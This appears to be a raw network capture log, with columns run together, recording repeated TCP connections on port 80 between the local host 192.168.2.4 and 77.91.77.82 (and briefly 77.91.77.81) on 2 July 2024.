                                            Jul 2, 2024 08:27:39.158497095 CEST806394577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:39.158593893 CEST6394580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:39.266947985 CEST6394580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:39.267369986 CEST6394680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:39.273013115 CEST806394677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:39.273140907 CEST6394680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:39.273324966 CEST806394577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:39.273329020 CEST6394680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:39.273375034 CEST6394580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:39.279087067 CEST806394677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:39.968667984 CEST806394677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:39.968736887 CEST6394680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:39.969954967 CEST6394680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:39.974777937 CEST806394677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:40.197369099 CEST806394677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:40.197446108 CEST6394680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:40.313683987 CEST6394680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:40.314138889 CEST6394780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:40.319036961 CEST806394677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:40.319135904 CEST6394680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:40.319144964 CEST806394777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:40.319226027 CEST6394780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:40.319431067 CEST6394780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:40.324151993 CEST806394777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:41.019453049 CEST806394777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:41.019575119 CEST6394780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:41.021142006 CEST6394780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:41.025861979 CEST806394777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:41.242199898 CEST806394777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:41.242311001 CEST6394780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:41.347475052 CEST6394780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:41.347846985 CEST6394880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:41.355568886 CEST806394877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:41.355587006 CEST806394777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:41.355695963 CEST6394780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:41.355696917 CEST6394880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:41.355894089 CEST6394880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:41.361658096 CEST806394877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:42.054740906 CEST806394877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:42.054802895 CEST6394880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:42.055612087 CEST6394880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:42.060550928 CEST806394877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:42.272001982 CEST806394877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:42.272066116 CEST6394880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:42.376230955 CEST6394880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:42.376633883 CEST6394980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:42.381181955 CEST806394877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:42.381247044 CEST6394880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:42.381316900 CEST806394977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:42.381380081 CEST6394980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:42.381548882 CEST6394980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:42.386250019 CEST806394977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:43.105432034 CEST806394977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:43.105720997 CEST6394980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.113204002 CEST6394980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.118021965 CEST806394977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:43.339029074 CEST806394977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:43.339318037 CEST6394980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.458878994 CEST6394980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.459208965 CEST6395080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.464356899 CEST806395077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:43.464543104 CEST6395080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.464560986 CEST806394977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:43.464873075 CEST6395080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.464889050 CEST6394980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.469635963 CEST806395077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:43.470541954 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:27:43.473705053 CEST6395080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.475733042 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:27:43.475950956 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:27:43.487514019 CEST6395180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.492325068 CEST806395177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:43.492830038 CEST6395180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.493576050 CEST6395180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:43.498344898 CEST806395177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:44.181431055 CEST806395177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:44.185174942 CEST6395180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:44.300734043 CEST6395180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:44.301044941 CEST6395280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:44.305888891 CEST806395277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:44.305968046 CEST6395280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:44.306045055 CEST806395177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:44.306174040 CEST6395180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:44.306242943 CEST6395280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:44.311012030 CEST806395277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:44.994637966 CEST806395277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:44.994741917 CEST6395280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:44.997889042 CEST6395280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:44.998191118 CEST6395380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.003271103 CEST806395277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:45.003284931 CEST806395377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:45.003326893 CEST6395280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.003390074 CEST6395380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.004108906 CEST6395380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.008913994 CEST806395377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:45.722793102 CEST806395377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:45.722881079 CEST6395380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.834727049 CEST6395380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.835083961 CEST6395480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.840400934 CEST806395477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:45.840461016 CEST6395480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.840579987 CEST6395480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.840650082 CEST806395377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:45.840737104 CEST6395380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:45.845943928 CEST806395477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:46.544487000 CEST806395477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:46.544631958 CEST6395480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:46.551422119 CEST6395480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:46.551737070 CEST6395580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:46.556531906 CEST806395577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:46.556633949 CEST806395477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:46.556693077 CEST6395480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:46.556711912 CEST6395580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:46.556972980 CEST6395580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:46.561688900 CEST806395577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:47.254251957 CEST806395577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:47.254470110 CEST6395580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:47.362195969 CEST6395580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:47.362514973 CEST6395680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:47.367343903 CEST806395677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:47.367547989 CEST806395577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:47.367634058 CEST6395680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:47.367636919 CEST6395580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:47.367784023 CEST6395680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:47.372503042 CEST806395677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.061872005 CEST806395677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.061964035 CEST6395680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.065129042 CEST6395680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.065434933 CEST6395780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.070991993 CEST806395777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.071010113 CEST806395677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.071058989 CEST6395780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.071083069 CEST6395680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.071360111 CEST6395780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.076112986 CEST806395777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.762784958 CEST806395777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.764341116 CEST6395780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.877919912 CEST6395780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.878201962 CEST6395880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.883423090 CEST806395777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.883449078 CEST806395877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.883502960 CEST6395780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.883533955 CEST6395880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.883661985 CEST6395880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.889254093 CEST806395877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.891107082 CEST6395880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.891154051 CEST6395880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.893802881 CEST6395980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.898703098 CEST806395977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:48.900310993 CEST6395980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.900490046 CEST6395980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:48.905299902 CEST806395977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:49.612490892 CEST806395977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:49.612742901 CEST6395980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.721813917 CEST6395980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.722168922 CEST6396080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.727144957 CEST806396077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:49.727262020 CEST6396080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.727291107 CEST806395977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:49.727345943 CEST6395980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.727516890 CEST6396080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.732566118 CEST806396077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:49.735172033 CEST6396080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.738221884 CEST6396180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.743124962 CEST806396177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:49.743201971 CEST6396180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.743341923 CEST6396180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:49.748528004 CEST806396177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:50.438713074 CEST806396177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:50.438780069 CEST6396180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.550101995 CEST6396180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.550431967 CEST6396280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.555320024 CEST806396177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:50.555335045 CEST806396277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:50.555385113 CEST6396180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.555432081 CEST6396280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.555696964 CEST6396280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.560729980 CEST806396277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:50.563150883 CEST6396280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.565541029 CEST6396380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.570446014 CEST806396377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:50.570761919 CEST6396380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.570885897 CEST6396380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:50.576083899 CEST806396377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:51.258675098 CEST806396377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:51.258749008 CEST6396380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.366200924 CEST6396380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.366497993 CEST6396480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.371292114 CEST806396477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:51.371346951 CEST806396377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:51.371373892 CEST6396480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.371407032 CEST6396380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.371644020 CEST6396480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.375508070 CEST6396480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.376471043 CEST806396477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:51.376530886 CEST6396480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.378052950 CEST6396580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.382814884 CEST806396577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:51.382893085 CEST6396580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.383019924 CEST6396580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:51.387770891 CEST806396577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:52.071144104 CEST806396577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:52.071208954 CEST6396580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.192543983 CEST6396580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.193002939 CEST6396680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.197849989 CEST806396577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:52.197865009 CEST806396677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:52.197915077 CEST6396580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.197951078 CEST6396680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.198167086 CEST6396680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.202934027 CEST806396677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:52.904476881 CEST806396677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:52.908335924 CEST6396680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.911094904 CEST6396680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.911417007 CEST6396780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.916264057 CEST806396677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:52.916280985 CEST806396777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:52.916356087 CEST6396680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.916393995 CEST6396780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.916631937 CEST6396780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:52.921350956 CEST806396777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:53.632946968 CEST806396777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:53.633017063 CEST6396780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:53.737514019 CEST6396780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:53.737862110 CEST6396880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:53.742687941 CEST806396877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:53.743242025 CEST806396777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:53.743346930 CEST6396780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:53.743360043 CEST6396880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:53.743527889 CEST6396880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:53.748243093 CEST806396877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:54.452168941 CEST806396877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:54.452331066 CEST6396880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:54.455816031 CEST6396880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:54.456193924 CEST6396980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:54.461119890 CEST806396877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:54.461194992 CEST806396977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:54.461270094 CEST6396880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:54.461319923 CEST6396980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:54.461580038 CEST6396980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:54.467155933 CEST806396977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:55.171885014 CEST806396977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:55.172065973 CEST6396980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.284683943 CEST6396980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.285011053 CEST6397080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.290333986 CEST806396977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:55.290352106 CEST806397077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:55.290389061 CEST6396980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.290440083 CEST6397080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.290575027 CEST6397080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.295309067 CEST806397077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:55.975987911 CEST806397077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:55.976043940 CEST6397080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.979921103 CEST6397080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.980220079 CEST6397180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.984946012 CEST806397177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:55.985001087 CEST806397077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:55.985069990 CEST6397080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.985084057 CEST6397180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.985210896 CEST6397180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:55.989980936 CEST806397177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:56.676019907 CEST806397177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:56.676229954 CEST6397180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:56.785676003 CEST6397180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:56.786209106 CEST6397280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:56.790874958 CEST806397177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:56.790932894 CEST6397180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:56.790990114 CEST806397277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:56.791048050 CEST6397280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:56.791466951 CEST6397280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:56.796153069 CEST806397277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:57.765178919 CEST806397277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:57.765275955 CEST6397280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.767267942 CEST806397277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:57.767364025 CEST6397280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.769525051 CEST6397280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.769838095 CEST6397380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.774679899 CEST806397377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:57.775259972 CEST806397277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:57.775326014 CEST6397280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.775337934 CEST6397380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.775561094 CEST6397380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.780415058 CEST806397377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:57.782075882 CEST6397380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.901032925 CEST6397480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.905889034 CEST806397477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:57.905961037 CEST6397480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.906393051 CEST6397480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:57.911262035 CEST806397477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:58.619215012 CEST806397477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:58.619326115 CEST6397480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:58.625844955 CEST6397480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:58.626193047 CEST6397580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:58.631717920 CEST806397577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:58.631779909 CEST6397580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:58.631956100 CEST806397477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:58.632041931 CEST6397580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:58.632066011 CEST6397480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:58.637659073 CEST806397577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:59.324934959 CEST806397577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:59.326447964 CEST6397580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:59.440644026 CEST6397580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:59.441000938 CEST6397680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:59.446607113 CEST806397677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:59.446901083 CEST806397577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:59.447005033 CEST6397580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:59.447166920 CEST6397680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:59.447166920 CEST6397680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:59.451988935 CEST806397677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:00.160264015 CEST806397677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:00.160414934 CEST6397680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.163592100 CEST6397680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.163976908 CEST6397780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.168535948 CEST806397677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:00.168715000 CEST806397777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:00.168776035 CEST6397680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.168807030 CEST6397780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.169070959 CEST6397780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.173808098 CEST806397777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:00.859476089 CEST806397777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:00.859550953 CEST6397780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.972239017 CEST6397780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.972557068 CEST6397880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.977365017 CEST806397877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:00.977734089 CEST806397777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:00.977828979 CEST6397780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.978266954 CEST6397880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.978267908 CEST6397880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:00.983052969 CEST806397877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:01.683527946 CEST806397877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:01.683597088 CEST6397880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:01.701090097 CEST6397880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:01.702342987 CEST6397980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:01.706752062 CEST806397877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:01.706806898 CEST6397880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:01.707120895 CEST806397977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:01.707211018 CEST6397980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:01.717927933 CEST6397980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:01.722733974 CEST806397977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:02.397227049 CEST806397977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:02.397295952 CEST6397980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:02.534959078 CEST6397980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:02.535258055 CEST6398080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:02.540041924 CEST806398077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:02.540060997 CEST806397977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:02.540134907 CEST6397980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:02.540148973 CEST6398080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:02.540443897 CEST6398080192.168.2.477.91.77.82
